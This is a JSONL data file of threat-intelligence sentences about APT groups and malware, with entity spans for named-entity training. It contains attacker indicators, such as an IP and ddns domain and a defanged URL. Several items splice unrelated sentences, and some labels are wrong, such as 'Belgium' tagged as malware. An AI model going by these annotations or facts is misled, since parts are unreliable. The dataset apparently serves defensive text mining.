{"text": "We didn’t start out looking for KASPERAGENT , but a file hit on one of our YARA rules for an executable designed to display a fake XLS icon – one way adversaries attempt to trick targets into thinking a malicious file is innocuous .", "spans": {"MALWARE: KASPERAGENT": [[32, 43]]}, "info": {"id": "cyberner_stix_train_006412", "source": "cyberner_stix_train"}}
{"text": "This backdoor is executed using the CMD_EXECUTE command .", "spans": {}, "info": {"id": "cyberner_stix_train_006413", "source": "cyberner_stix_train"}}
{"text": "This is known as a targeted attack . The Leafminer 's post-compromise toolkit suggests that Leafminer is looking for email data , files , and database servers on compromised target systems . APT33 : 192.119.15.37 mynetwork.ddns.net . What ’s more , two other vulnerabilities in MOVEit were found while new victims were still coming forward .", "spans": {"THREAT_ACTOR: Leafminer": [[41, 50], [92, 101]], "THREAT_ACTOR: APT33": [[191, 196]], "IP_ADDRESS: 192.119.15.37": [[199, 212]], "DOMAIN: mynetwork.ddns.net": [[213, 231]], "TOOL: MOVEit": [[278, 284]]}, "info": {"id": "cyberner_stix_train_006414", "source": "cyberner_stix_train"}}
{"text": "By later August , TA505 had turned back to large attachment campaigns , primarily distributing various zipped scripts that downloaded Locky .", "spans": {"THREAT_ACTOR: TA505": [[18, 23]], "TOOL: zipped": [[103, 109]], "MALWARE: Locky": [[134, 139]]}, "info": {"id": "cyberner_stix_train_006415", "source": "cyberner_stix_train"}}
{"text": "Dump data from the Viber messenger app . Another such an exceptional espionage platform is \" ProjectSauron , also known as \" Strider \" . This group has been operating in the Middle East since 2012 . Indicators of compromise help answer the question What happened while indicators of attack can help answer questions like What is happening and why A proactive approach to detection uses both IOAs and IOCs to discover security incidents or threats in as close to real time as possible .", "spans": {"SYSTEM: Viber messenger": [[19, 34]], "TOOL: ProjectSauron": [[93, 106]], "THREAT_ACTOR: Strider": [[125, 132]]}, "info": {"id": "cyberner_stix_train_006416", "source": "cyberner_stix_train"}}
{"text": "The following examples were developed using a Winnti installer that was used in attacks in December 2016 .", "spans": {"MALWARE: Winnti": [[46, 52]]}, "info": {"id": "cyberner_stix_train_006417", "source": "cyberner_stix_train"}}
{"text": "Instead , we downloaded and compiled the 1.2.0.0 server of the open-source Quasar RAT , having determined that this seemed likely the most similar version .", "spans": {"MALWARE: Quasar RAT": [[75, 85]]}, "info": {"id": "cyberner_stix_train_006418", "source": "cyberner_stix_train"}}
{"text": "DustySky has been developed and used since May 2015 by Molerats ( aka \" Gaza cybergang \" ) , a terrorist group whose main objective in this campaign is intelligence gathering . On multiple dates in 2017 , TEMP.Veles struggled to execute this utility on multiple victim systems , potentially due to AV detection .", "spans": {"TOOL: DustySky": [[0, 8]], "THREAT_ACTOR: Molerats": [[55, 63]], "THREAT_ACTOR: Gaza cybergang": [[72, 86]], "THREAT_ACTOR: terrorist group": [[95, 110]], "THREAT_ACTOR: TEMP.Veles": [[205, 215]]}, "info": {"id": "cyberner_stix_train_006419", "source": "cyberner_stix_train"}}
{"text": "Symantec discovered the most recent wave of Tick attacks in July 2015 , when BRONZE BUTLER compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks . To do this , it employs a number of specific commands via DNSMessenger .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: BRONZE BUTLER": [[77, 90]], "MALWARE: DNSMessenger": [[258, 270]]}, "info": {"id": "cyberner_stix_train_006420", "source": "cyberner_stix_train"}}
{"text": "These emails included recruitment-themed lures and links to malicious HTML application ( HTA ) files . The malware author seemingly made unpacking the malware more difficult to slow down or even evade the antivirus engine ’s scanning process .", "spans": {"TOOL: HTML application": [[70, 86]], "MALWARE: HTA": [[89, 92]], "MALWARE: malware": [[107, 114]]}, "info": {"id": "cyberner_stix_train_006421", "source": "cyberner_stix_train"}}
{"text": "downloader , Older version of CORESHELL , Sofacy .", "spans": {"MALWARE: CORESHELL": [[30, 39]], "MALWARE: Sofacy": [[42, 48]]}, "info": {"id": "cyberner_stix_train_006422", "source": "cyberner_stix_train"}}
{"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) .", "spans": {"MALWARE: slides": [[33, 39]], "VULNERABILITY: CVE-2017-8759": [[64, 77]], "TOOL: Microsoft .NET framework": [[121, 145]], "FILEPATH: MXI Player": [[148, 158]], "DOMAIN: com.mxi.videoplay": [[288, 305]]}, "info": {"id": "cyberner_stix_train_006423", "source": "cyberner_stix_train"}}
{"text": "CONCLUSIONS FakeSpy was first seen in October 2017 and until recently mainly targeted East Asian countries . Notably , the group’s use of email as infection vector seems to yield success for their campaigns . ther names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon .", "spans": {"MALWARE: FakeSpy": [[12, 19]], "THREAT_ACTOR: group’s": [[123, 130]], "TOOL: email": [[138, 143]], "THREAT_ACTOR: Vixen Panda": [[238, 249]], "THREAT_ACTOR: Ke3chang": [[252, 260]], "THREAT_ACTOR: Royal APT": [[263, 272]], "THREAT_ACTOR: Playful Dragon": [[279, 293]]}, "info": {"id": "cyberner_stix_train_006424", "source": "cyberner_stix_train"}}
{"text": "The attackers deploy a rare modification of the AZZY backdoor , which is used for the initial reconnaissance .", "spans": {"MALWARE: AZZY backdoor": [[48, 61]]}, "info": {"id": "cyberner_stix_train_006425", "source": "cyberner_stix_train"}}
{"text": "The OnionDuke toolset also includes a dropper , an information stealer variant and multiple distinct versions of the core component that is responsible for interacting with the various modules .", "spans": {"MALWARE: OnionDuke": [[4, 13]]}, "info": {"id": "cyberner_stix_train_006426", "source": "cyberner_stix_train"}}
{"text": "Wind Tre SpA - an Italian telecom operator TMCell - the state owned mobile operator in Turkmenistan Deployment to users outside Apple ’ s app store was made possible through abuse of Apple ’ s enterprise provisioning system . WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 . MuddyWater has recently been targeting victims likely from Lebanon and Oman , while leveraging compromised domains , one of which is owned by an Israeli web developer .", "spans": {"ORGANIZATION: Wind Tre SpA": [[0, 12]], "ORGANIZATION: TMCell": [[43, 49]], "ORGANIZATION: Apple": [[128, 133], [183, 188]], "TOOL: WannaCry": [[226, 234]], "VULNERABILITY: EternalBlue": [[270, 281]], "THREAT_ACTOR: Shadow Brokers": [[311, 325]], "THREAT_ACTOR: MuddyWater": [[347, 357]]}, "info": {"id": "cyberner_stix_train_006427", "source": "cyberner_stix_train"}}
{"text": "Kaspersky first became aware of BlackOasis’ activities in May 2016 , while investigating another Adobe Flash zero day . Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: BlackOasis’": [[32, 43]], "VULNERABILITY: zero day": [[109, 117]], "VULNERABILITY: exploit": [[130, 137], [194, 201]], "FILEPATH: EternalRomance": [[145, 159]], "FILEPATH: EternalSynergy": [[173, 187]], "FILEPATH: CVE-2017-0143": [[206, 219]]}, "info": {"id": "cyberner_stix_train_006428", "source": "cyberner_stix_train"}}
{"text": "Using these tactics Scarlet Mimic can directly target previously identified individuals ( spear phishing ) as well as unidentified individuals who are interested in a specific subject ( watering hole ) . In this blog , we look at the Winnti malware implant as used by two known activity groups BARIUM and LEAD .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[20, 33]], "MALWARE: Winnti": [[234, 240]], "MALWARE: malware": [[241, 248]], "THREAT_ACTOR: BARIUM": [[294, 300]]}, "info": {"id": "cyberner_stix_train_006429", "source": "cyberner_stix_train"}}
{"text": "In most cases , these click fraud apps were uninstalled by the users , probably due to the low quality of the apps . SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire . The threat actors achieved an initial foothold into the infrastructure via phishing email that convinced victims to install the Xyligan remote access Trojan ( RAT ) on a system . Then , it copies the system file “ rundll32.exe ” to the same directory with name “ ntuser.exe ” and runs it with “ ntuser.bin ” as a parameter , effectively loading the malicious DLL file .", "spans": {"ORGANIZATION: SPEAR": [[117, 122]], "TOOL: PassCV samples": [[141, 155]], "TOOL: RAT": [[216, 219]], "TOOL: Netwire": [[227, 234]], "TOOL: phishing email": [[312, 326]], "MALWARE: Xyligan": [[365, 372]], "MALWARE: Trojan": [[387, 393]], "MALWARE: the malicious DLL file": [[582, 604]]}, "info": {"id": "cyberner_stix_train_006430", "source": "cyberner_stix_train"}}
{"text": "Next , ZeroT uses HTTP beacons to transmit information about the infected system to the command and control ( C&C ) .", "spans": {"MALWARE: ZeroT": [[7, 12]], "TOOL: command and control": [[88, 107]], "TOOL: C&C": [[110, 113]]}, "info": {"id": "cyberner_stix_train_006431", "source": "cyberner_stix_train"}}
{"text": "For example , some of the more advanced banking Trojans now offer features such as a back-connect proxy , screen-streaming and even remote control . SectorJ04 was recently confirmed to use additional backdoor called AdroMut and FlowerPippi , which is used to install other backdoor such as FlawedAmmy RAT on behalf of the MSI file , or to collect system information and send it to the attacker’s server . In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 — at least based on the file properties of the decoy documents they've been sending to their targets .", "spans": {"THREAT_ACTOR: SectorJ04": [[149, 158]], "TOOL: AdroMut": [[216, 223]], "TOOL: FlowerPippi": [[228, 239]], "THREAT_ACTOR: attacker’s": [[385, 395]], "THREAT_ACTOR: REDBALDKNIGHT": [[415, 428]], "FILEPATH: decoy documents": [[539, 554]]}, "info": {"id": "cyberner_stix_train_006432", "source": "cyberner_stix_train"}}
{"text": "Potential targets such as Hamas who controls the Gaza strip and counts Mazen Fuqaha and Yahya al-Sinwar as members , Israel which is accused of involvement in the assassination of Mazen Fuqaha , and the Fatah party of which the Prime Minister and President of the Palestinian Authority are members .", "spans": {"ORGANIZATION: Hamas": [[26, 31]], "ORGANIZATION: Fatah party": [[203, 214]], "ORGANIZATION: Palestinian Authority": [[264, 285]]}, "info": {"id": "cyberner_stix_train_006433", "source": "cyberner_stix_train"}}
{"text": "Capture real-time voice calls in any network or app by hooking into the “ mediaserver ” system service RCSAndroid in the Wild Our analysis reveals that this RCSAndroid ( AndroidOS_RCSAgent.HRX ) has been in the wild since 2012 . In some cases , the attackers used the Society for Worldwide Interbank Financial Telecommunication ( SWIFT ) network to transfer money to their accounts . shown after the First Block . This sample works in tandem with PIEHOP , which sets up the execution .", "spans": {"MALWARE: RCSAndroid": [[103, 113], [157, 167]], "THREAT_ACTOR: attackers": [[249, 258]], "TOOL: Worldwide Interbank Financial Telecommunication": [[280, 327]], "TOOL: SWIFT": [[330, 335]]}, "info": {"id": "cyberner_stix_train_006434", "source": "cyberner_stix_train"}}
{"text": "There is no way to access the original app again even if victims terminate the overlay process and reopen app , until credit card ( name , number , expiry date , security code ) and/or bank information ( PIN , VBV passcode , date of birth , etc . The Plead malware is a backdoor which , according to Trend Micro , is used by the BlackTech group in targeted attacks . The term zero-day is indicative of a software flaw that remains unknown to the software ’s creator . Cyclops Blink can use non - standard ports for C2 not typically associated with HTTP or HTTPS traffic.[10 ] DarkVishnya used ports 5190 and 7900 for shellcode listeners , and 4444 , 4445 , 31337 for shellcode C2.[11 ]", "spans": {"TOOL: Plead malware": [[251, 264]], "TOOL: backdoor": [[270, 278]], "ORGANIZATION: Trend Micro": [[300, 311]], "VULNERABILITY: zero-day": [[376, 384]], "MALWARE: Cyclops Blink": [[468, 481]], "MALWARE: DarkVishnya": [[576, 587]]}, "info": {"id": "cyberner_stix_train_006435", "source": "cyberner_stix_train"}}
{"text": "Command Arguments DOWNLOAD_LIST C:\\ProgramData\\Office\\MS\\out.txt , C:\\ProgramData\\Office\\MS\\text.txt .", "spans": {"FILEPATH: C:\\ProgramData\\Office\\MS\\out.txt": [[32, 64]], "FILEPATH: C:\\ProgramData\\Office\\MS\\text.txt": [[67, 100]]}, "info": {"id": "cyberner_stix_train_006436", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //nttdocomo-qaw [ . In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM , JHUHUGIT , AZZY and a few others . The overall attack leverages several different approaches , which are popular techniques amongst red teamers , espionage focused adversaries , and large scale criminal campaigns . Adversaries may utilize many different protocols , including those used for web browsing , transferring files , electronic mail , or DNS .", "spans": {"THREAT_ACTOR: Sofacy group": [[47, 59]], "TOOL: CORESHELL": [[130, 139]], "TOOL: SPLM": [[142, 146]], "TOOL: JHUHUGIT": [[149, 157]], "TOOL: AZZY": [[160, 164]], "THREAT_ACTOR: Adversaries": [[364, 375]]}, "info": {"id": "cyberner_stix_train_006437", "source": "cyberner_stix_train"}}
{"text": "Of the 10 million people who downloaded HummingBad-contaminated apps , an estimated 286,000 of them were located in the US . PapaAlfa is believed to be one of the proxy malware components that the Lazarus Group uses to hide the true command and control server ( s ) for operations . One Shamoon victim in Saudi Arabia had recently also been attacked by Elfin and had been infected with the Stonedrill malware ( Trojan.Stonedrill ) used by Elfin . When CrowdStrike researchers later reproduced the attack , events were present in CozyDuke - also known as CozyBear , CozyCar and Office Monkeys ( among others ) , and whose activity appears to align with advanced persistent threat APT29 - is a threat actor which came to prominence in 2014 when it is believed to have staged a series of precise attacks on high profile targets including the US White House , Department of State and the Democratic National Committee .", "spans": {"MALWARE: HummingBad-contaminated": [[40, 63]], "TOOL: PapaAlfa": [[125, 133]], "THREAT_ACTOR: Lazarus Group": [[197, 210]], "THREAT_ACTOR: Shamoon": [[287, 294]], "THREAT_ACTOR: Elfin": [[353, 358], [439, 444]], "MALWARE: Stonedrill": [[390, 400]], "MALWARE: Trojan.Stonedrill": [[411, 428]], "ORGANIZATION: CrowdStrike researchers": [[452, 475]], "MALWARE: CozyDuke": [[529, 537]], "MALWARE: CozyBear": [[554, 562]], "MALWARE: CozyCar": [[565, 572]], "MALWARE: Office Monkeys": [[577, 591]], "THREAT_ACTOR: APT29": [[679, 684]], "THREAT_ACTOR: threat actor": [[692, 704]], "ORGANIZATION: US White House": [[839, 853]], "ORGANIZATION: Department of State": [[856, 875]], "ORGANIZATION: Democratic National Committee": [[884, 913]]}, "info": {"id": "cyberner_stix_train_006438", "source": "cyberner_stix_train"}}
{"text": "At a high level , hot patching can transparently apply patches to executables and DLLs in actively running processes , which does not happen with traditional methods of code injection such as CreateRemoteThread or WriteProcessMemory . This campaign , first observed in 2010 , is believed to be operated by a well-funded group given how it appeared to have purchased the source code of the BIFROST backdoor , which the operators enhanced and created other tools from .", "spans": {"MALWARE: CreateRemoteThread": [[192, 210]], "MALWARE: WriteProcessMemory": [[214, 232]]}, "info": {"id": "cyberner_stix_train_006439", "source": "cyberner_stix_train"}}
{"text": "Matters pertaining to the Israeli-Palestinian Conflict : Some of the documents in this campaign reference different aspects of the Israeli-Palestinian conflict , and the efforts for ceasefire and peace processes between the Israelis and the Palestinians , including the latest peace plan made by President Donald Trump and Senior Advisor to the President of the United States Jared Kushner .", "spans": {}, "info": {"id": "cyberner_stix_train_006440", "source": "cyberner_stix_train"}}
{"text": "bde7847487125084f9e03f2b6b05adc3 2 v3.12s 2560942bb50ee6e6f55afc495d238a12 2 v3.18s It ’ s interesting that the issuer “ Sun ” matches the “ Sun1 ” and “ Sun2 ” identifiers of infected devices from the FTP server , suggesting they may be test devices . Our investigation into this campaign reveals that the actor used multiple malware implants , including an unknown implant with capabilities similar to Bankshot . This was quickly followed 15 seconds later by the installation of a credential dumping to csidl_profile\\appdata\\roaming\\microsoft\\credentials\\dwm32.exe , and the execution of powershell commands via PowerShell Empire , a freely available post-exploitation framework , to bypass logging on the infected machine . A clever example was ‘ Office Monkeys LOL Video.zip ’ .", "spans": {"THREAT_ACTOR: actor": [[307, 312]], "TOOL: Bankshot": [[404, 412]], "FILEPATH: csidl_profile\\appdata\\roaming\\microsoft\\credentials\\dwm32.exe": [[505, 566]], "TOOL: powershell": [[590, 600]], "TOOL: PowerShell Empire": [[614, 631]]}, "info": {"id": "cyberner_stix_train_006441", "source": "cyberner_stix_train"}}
{"text": "The CrowdStrike Falcon Intelligence™ team 's tracking of MYTHIC LEOPARD began in late 2016 , when evidence of an attack surfaced against a victim based in India and working in the hospitality sector . When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer .", "spans": {"ORGANIZATION: CrowdStrike Falcon Intelligence™": [[4, 36]], "ORGANIZATION: hospitality sector": [[180, 198]], "MALWARE: Word": [[233, 237]], "ORGANIZATION: Microsoft": [[295, 304]], "VULNERABILITY: CVE-2015-2545": [[348, 361]], "THREAT_ACTOR: attacker": [[395, 403]]}, "info": {"id": "cyberner_stix_train_006442", "source": "cyberner_stix_train"}}
{"text": "Once the malware can use accessibility services , it has the ability to operate as a keylogger and can retrieve notifications about other installed applications and content of open windows . One hour later , Bemstour was used against an educational institution in Belgium . Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called \" Rocket Kitten \" ( AKA Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish ) as well as an older attack campaign called Newscasters .", "spans": {"MALWARE: Bemstour": [[208, 216]], "MALWARE: Belgium": [[264, 271]], "THREAT_ACTOR: Rocket Kitten": [[408, 421]], "THREAT_ACTOR: Operation Saffron Rose": [[430, 452]], "THREAT_ACTOR: Ajax Security Team": [[455, 473]], "THREAT_ACTOR: Operation Woolen-Goldfish": [[476, 501]]}, "info": {"id": "cyberner_stix_train_006443", "source": "cyberner_stix_train"}}
{"text": "That said , so as to hinder detection of new versions , the Trojan ’ s APK file and the C & C server domains are changed regularly , and the Trojan download links are often one-time-use . this SWC was used to specifically target Turkish . Trend Micro™ XGen™ security provides high-fidelity machine learning that can secure the gateway and endpoints , and protect physical , virtual , and cloud workloads . Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality , or without the logical preconditions to trigger their expected function .", "spans": {"TOOL: SWC": [[193, 196]], "TOOL: Trend Micro™ XGen™": [[239, 257]]}, "info": {"id": "cyberner_stix_train_006445", "source": "cyberner_stix_train"}}
{"text": "A few days ago , Symantec discovered a new document that appears to be part of the ongoing BlackEnergy APT group attacks against Ukraine . Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails . The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.exe with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . Since at least 2011 , these hackers have been using malware to spy on corporate networks . Hackers are targeting high-tech companies as well as chemical and pharmaceutical companies . The hackers will map a company’s network and look for strategically favorable locations for placing their malware . The corporation conrms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions.” Henkel claims that a very small portion” of its worldwide IT systems had been aected — the systems in Germany . A BASF spokeswoman tells us in an email that in July 2015 , hackers had successfully overcome the rst levels” of defense . The tool was written by sta of Thyssenkrupp , because the industrial giant—company number eleven—had been spied on by Winnti . Hackers are charged with spying on a manufacturer of gas turbines . The Hong Kong government was spied on by the Winnti hackers . Komplex is a backdoor that has been used by APT28 on OS X and appears to be developed in a similar manner to XAgentOSX . While OceanLotus’ targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam . NewsBeef attacks against Saudi Arabian organizations and individuals are likely to continue . Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the APT10 during the compromise and was able to attribute data that was placed into it as being owned by Visma . Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe . These RAT families are discussed in Novetta’s other report on the Lazarus Group’s RAT and Staging capabilities . \bMagic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . \bSince at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a Cyber Espionage operation to collect information from defense , aerospace and petrochemical organizations . \bCTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash . \bCTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering . \bCharacterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East , as well as across Europe and in the United States . These malware families have a rich history of being used in many targeted attacks against government and private organizations . The activity surfaced in Southeast Asia , a region where APT10 frequently operates . The samples we analyzed originated from the Philippines . APT10 frequently targets the Southeast Asia region . Both of the loader’s variants and their various payloads that enSilo analyzed share similar Tactics , Techniques , and Procedures and code associated with APT10 . Typically , APT10 tends to employ a namesquatting scheme in their domains that aims to confuse the observer by posing as a legitimate domain . Also , the certificate embedded in the Quasar sample was issued at 22.12.2018 , which correlates with the file’s compilation date . Over the past three months , Recorded Future’s Insikt Group has observed an increase in APT33’s also known as Elfin infrastructure building and targeting activity , and on June 21 , 2019 , Yahoo . News reported that the U.S. Cyber Command launched cyberattacks on an Iranian spy group . Iranian state-sponsored threat actor APT33 has been conducting cyberespionage activity since at least 2013 , predominantly targeting nations in the Middle East , but also notably targeting U.S. , South Korean , and European commercial entities across a wide variety of sectors . Our research found that APT33 , or a closely aligned threat actor , continues to conduct and prepare for widespread cyberespionage activity , with over 1 , 200 domains used since March 28 , 2019 and with a strong emphasis on using commodity malware . The targeting of mainly Saudi Arabian organizations across a wide variety of industries aligns with historical targeting patterns for the group , which appear undeterred following previous exposés of their activity . Towards the end of April 2019 , we tracked down what we believe to be new activity by APT10 , a Chinese Cyber Espionage group . Almost 60% of the suspected APT33 domains that were classified to malware families related to njRAT infections , a RAT not previously associated with APT33 activity . Other commodity RAT malware families , such as AdwindRAT and RevengeRAT , were also linked to suspected APT33 domain activity . APT33 is an Iranian state-sponsored threat actor that has engaged in cyberespionage activities since at least 2013 . Western and Saudi organizations in industries that have been historically targeted by APT33 should be monitoring geopolitical developments and increasing the scrutiny of operational security controls focusing on detection and remediation of initial unauthorized access , specifically from phishing campaigns , webshells . Symantec’s Elfin report denoted additional targeting of the engineering , chemical , research , finance , IT , and healthcare sectors . We assess that the recent reporting on links between the Nasr Institute and Kavosh Security Group , as well as technical and persona analysis , overlaps among APT33 , APT35 , and MUDDYWATER , and is probably a result of the tiered structure that Iran utilizes to manage cyber operations . Recorded Future has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) . FireEye also noted in their 2017 report that the online handle xman_1365_x , ” found within the PDB path in an APT33 TURNEDUP backdoor sample , belonged to an individual at the Nasr Institute . Recorded Future’s Insikt Group has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) . Based on this information , it is possible that upon the exposure of the Nasr Institute as a front for Iranian state-sponsored offensive cyber activity , employees transitioned over to other entities , such as Kavosh , to protect their identities and minimize further exposure . Insikt Group researchers used proprietary methods , including Recorded Future Domain Analysis and Recorded Future Network Traffic Analysis , along with other common analytical approaches , to profile recently reported Iranian threat actor APT33’s domain and hosting infrastructure in an effort to identify recent activity . Insikt Group enumerated all domains reported as being used by APT33 since January 2019 . PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . Using data from Recorded Future Domain Analysis and combining it with data derived from Recorded Future Network Traffic Analysis , Insikt Group researchers were able to identify a small selection of likely targeted organizations impacted by suspected APT33 activity . Following the exposure of a wide range of their infrastructure and operations by Symantec earlier this year , we discovered that APT33 , or closely aligned actors , reacted by either parking or reassigning some of their domain infrastructure . Since late March , suspected APT33 threat actors have continued to use a large swath of operational infrastructure , well in excess of 1 , 200 domains , with many observed communicating with 19 different commodity RAT implants . While we haven’t observed a widespread targeting of commercial entities or regional adversaries like in previously documented APT33 operations , the handful of targeted organizations that we did observe were mainly located in Saudi Arabia across a range of industries , indicating ongoing targeting aligned with geopolitical aims . The zip contained a sample of the Poison Ivy malware which is also known to be used by APT10 . The new malware families , which we will examine later in this post , show APT34 relying on their PowerShell development capabilities , as well as trying their hand at Golang . Additionally , with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE) , Intelligence , and Advanced Practices teams , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 . This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however , we believe APT34's strongest interest is gaining access to financial , energy , and government entities . Additionally , with the assistance of FireEye Labs , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 . APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014 . This CPE was created to ensure our customers are updated with new discoveries , activity and detection efforts related to this campaign , along with other recent activity from Iranian-nexus threat actors to include APT33 , which is mentioned in this updated FireEye blog post . On June 19 , 2019 , FireEye’s Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances . A backdoor that communicates with a single command and control server using HTTP GET and POST requests , TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . FireEye’s Advanced Practices and Intelligence teams were able to identify additional artifacts and activity from the APT34 actors at other victim organizations . Of note , FireEye discovered two additional new malware families hosted at this domain , VALUEVAULT and LONGWATCH . This tool was previously observed during a Mandiant incident response in 2018 and , to date , solely utilized by APT34 . PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . FireEye detects this activity across our platforms , including named detection for TONEDEAF , VALUEVAULT , and LONGWATCH . Several spear-phishing campaigns attributed to Carbanak , all occurring between March and May 2018 , were analyzed by security researchers in 2018 . One of the most prolific APT-style cyberattacks , specifically targeting the financial sector , is known as Carbanak . Discovered in 2014 , the campaign quickly gained notoriety after compromising the security systems of 100 banks in 40 countries and stealing up to $1 billion in the process . The same group is believed to have also been using the Cobalt Strike framework to run sophisticated campaigns , plotting and performing financial heists of financial institutions . Banks in countries such as Russia , the United Kingdom , the Netherlands , Spain , Romania , Belarus , Poland , Estonia , Bulgaria , Georgia , Moldova , Kyrgyzstan , Armenia , Taiwan and Malaysia have allegedly been targeted with spearphishing emails , luring victims into clicking malicious URLs and executing booby-trapped documents . A Carbanak trademark in cyberattacks remains the use of Cobalt Strike – a powerful pentesting tool designed for exploiting and executing malicious code , simulating post-exploitation actions of advanced threat actors – which allows them to infiltrate the organization , move laterally , exfiltrate data , and deploy anti-forensic and evasion tools . However , this action doesn’t appear to have made a dent in the cybercriminal organization , as subsequent spear-phishing campaigns seem to have been reported from March until May 2018 . Bitdefender’s forensics and investigation team was contacted to look into a security incident that started in May 2018 with an email received by two of the bank’s employees . The Carbanak group , which has a long track record of compromising infrastructure belonging to financial institutions , is still active . Its purpose remains to manipulate financial assets , such as transferring funds from bank accounts or taking over ATM infrastructures and instructing them to dispense cash at predetermined time intervals . If the attack had succeeded , it would have given hackers control over the ATM network , while money mules would have been standing by the ATM machines at pre-set time intervals to cash them out . The actors uploaded a variety of tools that they used to perform additional activities on the compromised network , such as dumping credentials , as well as locating and pivoting to additional systems on the network . We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell . Bitdefender’s investigation shows the attackers’ main methods remain to quietly infiltrate the infrastructure by establishing a foothold on an employee’s system , then move laterally across the infrastructure or elevate privileges to find critical systems that manage financial transactions or ATM networks . We also found the China Chopper webshell on the SharePoint servers , which has also been used by the Emissary Panda threat group . Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 . In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks . This webshell activity took place across three SharePoint servers hosted by two different government organizations between April 1 , 2019 and April 16 , 2019 , where actors uploaded a total of 24 unique executables across the three SharePoint servers . The timeline shows three main clusters of activity across the three webshells , with activity occurring on two separate webshells within a very small window of time on April 2 , 2019 and the activity involving the third webshell two weeks later on April 16 , 2019 . In April 2019 , several national security organizations released alerts on CVE-2019-0604 exploitation , including the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security . Based on the functionality of the various tools uploaded to the webshells , we believe the threat actors breach the SharePoint servers to use as a beachhead , then attempt to move laterally across the network via stolen credentials and exploiting vulnerabilities . We also observed the actors uploading custom backdoors such as HyperBro which is commonly associated with Emissary Panda . Both of these alerts discussed campaigns in which actors used the CVE-2019-0604 to exploit SharePoint servers to install the China Chopper webshell . During our research into this attack campaign , Unit 42 gathered several tools that the Emissary Panda uploaded to the three webshells at the two government organizations . We also observed the actors uploading the HyperBro backdoor to one of the webshells , as well as legitimate executables that would sideload malicious DLLs that have overlapping code associated with known Emissary Panda activity . Lastly , we saw the actor uploading a custom backdoor called HyperBro , which has been associated with Emissary Panda operations in the past . The other overlapping files are tools used by the adversary to locate other systems on the network ( etool.exe ) , check to see if they are vulnerable to CVE-2017-0144 ( EternalBlue ) patched in MS07-010 (checker1.exe) and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket ( psexec.exe ) . Also , the NCSC advisory mentioned that the actors used a file name stylecss.aspx for their webshell , which is the same filename we saw associated with China Chopper . we will provide an analysis of the HyperBro tool in an upcoming section . However , using NCC Group’s research published in May 2018 , we were able to discover code overlaps between these DLLs and a sideloaded DLL that ran the SysUpdate tool that the NCC group has associated with an Emissary Panda campaign . The list also includes several hack tools , such as Mimikatz for credential dumping and several compiled python scripts used to locate and compromise other systems on the local network . Unfortunately , we do not have access to the PYTHON33.hlp or CreateTsMediaAdm.hlp files , so we do not know the final payload loaded by either of these DLLs . Figure 9 shows a code comparison between the PYTHON33.dll (right) and inicore_v2.3.30.dll (left) (SHA256: 4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822 ) , which was 